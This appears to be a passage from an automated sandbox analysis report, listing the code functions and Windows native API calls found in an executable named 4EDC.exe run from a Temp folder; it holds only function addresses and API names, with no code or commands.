Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0499A0 ZwCreateSection,LdrInitializeThunk, 22_2_6C0499A0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C040413 ZwUnmapViewOfSection, 22_2_6C040413
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8C14 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D8C14
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1411 ZwTraceEvent, 22_2_6C0C1411
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00E420 RtlpLoadUserUIByPolicy,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlpLoadUserUIByPolicy,ZwClose, 22_2_6C00E420
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04A420 ZwGetNlsSectionPtr, 22_2_6C04A420
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02FC39 ZwAssociateWaitCompletionPacket, 22_2_6C02FC39
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C091C49 ZwQueryInformationProcess, 22_2_6C091C49
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049C40 ZwAllocateVirtualMemoryEx, 22_2_6C049C40
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C005450 RtlClearThreadWorkOnBehalfTicket,memcmp,RtlClearThreadWorkOnBehalfTicket,ZwSetInformationThread, 22_2_6C005450
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0B3C60 RtlFlushSecureMemoryCache,ZwQueryVirtualMemory, 22_2_6C0B3C60
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02746D RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 22_2_6C02746D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049C70 ZwAlpcConnectPort, 22_2_6C049C70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C045C70 TpSetPoolMaxThreadsSoftLimit,ZwSetInformationWorkerFactory, 22_2_6C045C70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03AC7B ZwFreeVirtualMemory,RtlFillMemoryUlong,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint, 22_2_6C03AC7B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8C75 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D8C75
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C091C76 ZwQueryInformationProcess, 22_2_6C091C76
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04A480 ZwInitializeNlsFiles, 22_2_6C04A480
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 ZwAllocateVirtualMemory,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint, 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C083C93 wcschr,RtlInitUnicodeString,wcstoul,RtlAnsiStringToUnicodeString,RtlCompareUnicodeString,ZwProtectVirtualMemory,DbgPrintEx,RtlFreeUnicodeString, 22_2_6C083C93
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00EC9B RtlInitUnicodeString,ZwOpenKey,RtlpLoadUserUIByPolicy,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlFreeHeap,ZwClose,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlAllocateHeap,RtlpLoadMachineUIByPolicy,ZwClose, 22_2_6C00EC9B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C040CA1 ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken, 22_2_6C040CA1
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D4CAB ZwTraceControl, 22_2_6C0D4CAB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D9CB3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D9CB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03CCC0 memcpy,RtlGetNtSystemRoot,RtlInitUnicodeString,memcpy,ZwOpenKey,ZwClose,ZwEnumerateKey,DbgPrintEx,DbgPrintEx,DbgPrintEx, 22_2_6C03CCC0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04A4C0 ZwIsUILanguageComitted, 22_2_6C04A4C0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002CDB RtlFreeHeap,ZwClose,ZwSetEvent, 22_2_6C002CDB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8CD6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D8CD6
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00F4E3 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent, 22_2_6C00F4E3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C091CE4 ZwQueryInformationProcess, 22_2_6C091CE4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0B64FB ZwOpenKey,ZwQueryValueKey,RtlEqualUnicodeString,RtlEqualUnicodeString,RtlEqualUnicodeString,ZwClose, 22_2_6C0B64FB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C14FB memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0C14FB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C091D0B ZwSetInformationProcess, 22_2_6C091D0B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04AD10 ZwSetCachedSigningLevel, 22_2_6C04AD10
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C031520 RtlInitializeCriticalSectionEx,RtlInitializeCriticalSectionEx,RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C031520
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049520 ZwWaitForSingleObject, 22_2_6C049520
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BFD22 ZwQueryInformationProcess,RtlUniform, 22_2_6C0BFD22
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C034D3B memset,RtlRunOnceExecuteOnce,ZwTraceControl,memcmp,RtlNtStatusToDosError,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap, 22_2_6C034D3B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8D34 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D8D34
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C091D43 ZwQueryInformationThread, 22_2_6C091D43
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C030548 RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlRbInsertNodeEx,ZwQueryVirtualMemory, 22_2_6C030548
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D1D55 ZwFreeVirtualMemory,RtlWakeAddressAllNoFence, 22_2_6C0D1D55
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C091D6A ZwWaitForMultipleObjects, 22_2_6C091D6A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C6D61 ZwAllocateVirtualMemoryEx, 22_2_6C0C6D61
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049D70 ZwAlpcQueryInformation, 22_2_6C049D70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C091570 ZwQuerySystemInformation,RtlInitUnicodeString,memset,ZwAlpcConnectPort,ZwAlpcSendWaitReceivePort,ZwClose, 22_2_6C091570
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01DD80 RtlAcquireSRWLockShared,ZwQueryVirtualMemory,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlRaiseStatus,RtlAddressInSectionTable,RtlImageDirectoryEntryToData, 22_2_6C01DD80
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0CB581 RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0CB581
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1582 ZwTraceEvent, 22_2_6C0C1582
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C003591 ZwSetInformationFile, 22_2_6C003591
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0065A0 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion, 22_2_6C0065A0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049DA0 ZwAlpcSendWaitReceivePort, 22_2_6C049DA0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0495B0 ZwSetInformationThread, 22_2_6C0495B0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049DB0 ZwAlpcSetInformation, 22_2_6C049DB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C004DC0 RtlpUnWaitCriticalSection,RtlWakeAddressAllNoFence,RtlRaiseStatus,TpWaitForAlpcCompletion,RtlpUnWaitCriticalSection,ZwSetEvent,TpWaitForAlpcCompletion,ZwAlpcQueryInformation, 22_2_6C004DC0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0495C0 ZwSetEvent, 22_2_6C0495C0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02EDC4 ZwCancelWaitCompletionPacket, 22_2_6C02EDC4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0045D0 RtlGetThreadWorkOnBehalfTicket,RtlGetThreadWorkOnBehalfTicket,ZwQueryInformationThread, 22_2_6C0045D0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0495D0 ZwClose, 22_2_6C0495D0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BFDD3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0BFDD3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049DE0 ZwAssociateWaitCompletionPacket, 22_2_6C049DE0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0095F0 TpSetPoolMinThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMinThreads, 22_2_6C0095F0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BBDFA RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive, 22_2_6C0BBDFA
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0495F0 ZwQueryInformationFile, 22_2_6C0495F0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00C600 LdrQueryImageFileKeyOption,RtlInitUnicodeStringEx,ZwQueryValueKey,LdrQueryImageFileKeyOption,RtlFreeHeap,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,RtlUnicodeStringToInteger,memcpy, 22_2_6C00C600
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049610 ZwEnumerateValueKey, 22_2_6C049610
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C042E1C RtlInitializeCriticalSectionEx,ZwDelayExecution, 22_2_6C042E1C
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C092E14 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C092E14
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049E20 ZwCancelTimer2, 22_2_6C049E20
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D3E22 ZwTraceControl,RtlNtStatusToDosError,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error, 22_2_6C0D3E22
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00B630 ZwWaitForKeyedEvent, 22_2_6C00B630
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BFE3F memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0BFE3F
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049E30 ZwCancelWaitCompletionPacket, 22_2_6C049E30
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04B640 RtlUnhandledExceptionFilter,ZwTerminateProcess, 22_2_6C04B640
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04B650 RtlUnhandledExceptionFilter,ZwTerminateProcess, 22_2_6C04B650
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049650 ZwQueryValueKey, 22_2_6C049650
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C096652 ZwClose,RtlAllocateHeap,memcpy,ZwUnmapViewOfSection, 22_2_6C096652
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03BE62 ZwProtectVirtualMemory,RtlGetCurrentTransaction,RtlGetCurrentTransaction, 22_2_6C03BE62
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04AE70 ZwSetInformationWorkerFactory, 22_2_6C04AE70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049670 ZwQueryInformationProcess, 22_2_6C049670
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C003E80 RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C003E80
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BBE9B RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive, 22_2_6C0BBE9B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03DE9E RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwUnsubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap, 22_2_6C03DE9E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002E9F ZwCreateEvent,ZwClose, 22_2_6C002E9F
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049EA0 ZwCompareSigningLevels, 22_2_6C049EA0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C092EA3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C092EA3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D3EBC ZwTraceControl,RtlNtStatusToDosError,RtlSetLastWin32Error, 22_2_6C0D3EBC
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02E6B0 RtlSetThreadWorkOnBehalfTicket,memcmp,ZwSetInformationThread,RtlSetThreadWorkOnBehalfTicket, 22_2_6C02E6B0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0496C0 ZwSetInformationProcess, 22_2_6C0496C0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C039ED0 RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlAcquireSRWLockShared,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,ZwWaitForAlertByThreadId, 22_2_6C039ED0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0496D0 ZwCreateKey, 22_2_6C0496D0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0066D4 RtlInitUnicodeString,ZwQueryValueKey, 22_2_6C0066D4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002ED8 ZwWaitForAlertByThreadId,ZwWaitForAlertByThreadId, 22_2_6C002ED8
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8ED6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D8ED6
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0496E0 ZwFreeVirtualMemory, 22_2_6C0496E0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00B6F0 EtwEventWriteNoRegistration,ZwTraceEvent,RtlNtStatusToDosError, 22_2_6C00B6F0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0916FA ZwQueryWnfStateNameInformation,ZwUpdateWnfStateData,EtwEventWriteNoRegistration, 22_2_6C0916FA
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C05DEF0 RtlRaiseException,RtlCaptureContext,ZwRaiseException,RtlRaiseStatus, 22_2_6C05DEF0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02E6F9 ZwAlpcSetInformation, 22_2_6C02E6F9
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0176FE RtlInitUnicodeString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,ZwOpenKey,ZwClose, 22_2_6C0176FE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C039702 RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwReleaseWorkerFactoryWorker, 22_2_6C039702
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049710 ZwQueryInformationToken, 22_2_6C049710
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C096715 memset,memcpy,ZwTraceEvent, 22_2_6C096715
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid, 22_2_6C03E730
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049730 ZwQueryVirtualMemory, 22_2_6C049730
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BCF30 ZwAlertThreadByThreadId, 22_2_6C0BCF30
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049740 ZwOpenThreadToken, 22_2_6C049740
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03174B ZwFreeVirtualMemory,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory, 22_2_6C03174B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C040F48 ZwOpenKey,ZwClose,ZwClose,ZwCreateKey,RtlInitUnicodeStringEx,ZwSetValueKey,RtlInitUnicodeStringEx,ZwSetValueKey,ZwClose, 22_2_6C040F48
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C08A746 ZwGetCachedSigningLevel,ZwCompareSigningLevels,ZwSetCachedSigningLevel, 22_2_6C08A746
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049750 ZwQueryInformationThread, 22_2_6C049750
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C095F5F RtlInitUnicodeString,ZwOpenFile,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlAllocateHeap,RtlInitUnicodeString,ZwQueryDirectoryFile,RtlAllocateHeap,memcpy,RtlFreeHeap,ZwClose, 22_2_6C095F5F
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C006F60 RtlGetPersistedStateLocation,ZwOpenKey,memcpy,RtlGetPersistedStateLocation,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwQueryValueKey,RtlExpandEnvironmentStrings,memcpy,ZwClose,ZwClose,RtlFreeHeap, 22_2_6C006F60
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04AF60 ZwSetTimer2, 22_2_6C04AF60
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C09176C ZwOpenEvent,ZwWaitForSingleObject,ZwClose, 22_2_6C09176C
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8F6A RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D8F6A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03CF6A memcpy,memcpy,RtlDosPathNameToRelativeNtPathName_U,ZwOpenFile,memcpy,RtlFreeHeap,RtlDeleteBoundaryDescriptor,DbgPrintEx,DbgPrintEx,DbgPrintEx,ZwClose,RtlFreeHeap,DbgPrintEx,memcpy,DbgPrintEx,ZwClose, 22_2_6C03CF6A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049F70 ZwCreateIoCompletion, 22_2_6C049F70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049770 ZwSetInformationFile, 22_2_6C049770
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BCF70 RtlpGetUserOrMachineUILanguage4NLS,RtlInitUnicodeString,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,ZwClose, 22_2_6C0BCF70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C095780 DbgPrompt,ZwWow64DebuggerCall, 22_2_6C095780
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0B5F87 ZwUnmapViewOfSection, 22_2_6C0B5F87
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03FF9C RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlInitUnicodeString, 22_2_6C03FF9C
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C08A7AC ZwCompareSigningLevels,ZwCompareSigningLevels, 22_2_6C08A7AC
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0497A0 ZwUnmapViewOfSection, 22_2_6C0497A0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C043FA0 RtlGetLocaleFileMappingAddress,ZwInitializeNlsFiles,RtlGetLocaleFileMappingAddress,ZwUnmapViewOfSection, 22_2_6C043FA0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002FB0 RtlDestroyHeap,RtlDeleteCriticalSection,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlDestroyHeap,DbgPrint,DbgPrint,DbgPrint,RtlDebugPrintTimes,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C002FB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00F7C0 EtwNotificationUnregister,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwClose,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,EtwNotificationUnregister, 22_2_6C00F7C0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0497C0 ZwTerminateProcess, 22_2_6C0497C0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03D7CA RtlImageNtHeader,RtlFreeHeap,ZwCreateSection,ZwMapViewOfSection,ZwClose,RtlImageNtHeader,ZwClose,RtlFreeHeap,ZwClose,ZwClose,ZwUnmapViewOfSection, 22_2_6C03D7CA
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04AFD0 ZwShutdownWorkerFactory, 22_2_6C04AFD0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03DFDF RtlWakeAddressAllNoFence,ZwAlertThreadByThreadId,RtlWakeAddressAllNoFence, 22_2_6C03DFDF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C090FEC ZwDuplicateObject,ZwDuplicateObject, 22_2_6C090FEC
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0337EB RtlImageNtHeader,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,ZwCreateIoCompletion,ZwCreateWorkerFactory,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSetInformationWorkerFactory, 22_2_6C0337EB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C010FFD RtlInitUnicodeString,ZwQueryValueKey, 22_2_6C010FFD
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00E009 memset,ZwIsUILanguageComitted,RtlpGetNameFromLangInfoNode,ZwQueryInstallUILanguage,RtlLCIDToCultureName,RtlFreeHeap, 22_2_6C00E009
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0DF019 RtlInitUnicodeString,RtlInitUnicodeString,ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlInitUnicodeString,ZwClose,RtlFreeHeap, 22_2_6C0DF019
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00F018 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap, 22_2_6C00F018
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C034020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion, 22_2_6C034020
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049830 ZwOpenFile, 22_2_6C049830
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049840 ZwDelayExecution, 22_2_6C049840
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C005050 RtlSetCurrentDirectory_U,RtlAllocateHeap,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlSetCurrentDirectory_U,RtlFreeHeap,RtlFreeHeap, 22_2_6C005050
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049850 ZwQueryDirectoryFile, 22_2_6C049850
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8858 ZwAlertThreadByThreadId, 22_2_6C0D8858
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01106F ZwOpenKey,ZwClose, 22_2_6C01106F
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C091879 ZwAllocateVirtualMemory,memset,RtlInitializeSid, 22_2_6C091879
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C003880 TpSetWaitEx,RtlAllocateHeap,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,TpSetWaitEx, 22_2_6C003880
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03A080 RtlDeleteCriticalSection,RtlAcquireSRWLockExclusive,RtlDeleteCriticalSection,RtlDeleteCriticalSection,ZwClose,RtlDeleteCriticalSection, 22_2_6C03A080
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04108B ZwClose, 22_2_6C04108B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02E090 RtlWow64EnableFsRedirectionEx,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent, 22_2_6C02E090
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04A890 ZwQueryDebugFilterState, 22_2_6C04A890
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049890 ZwFsControlFile, 22_2_6C049890
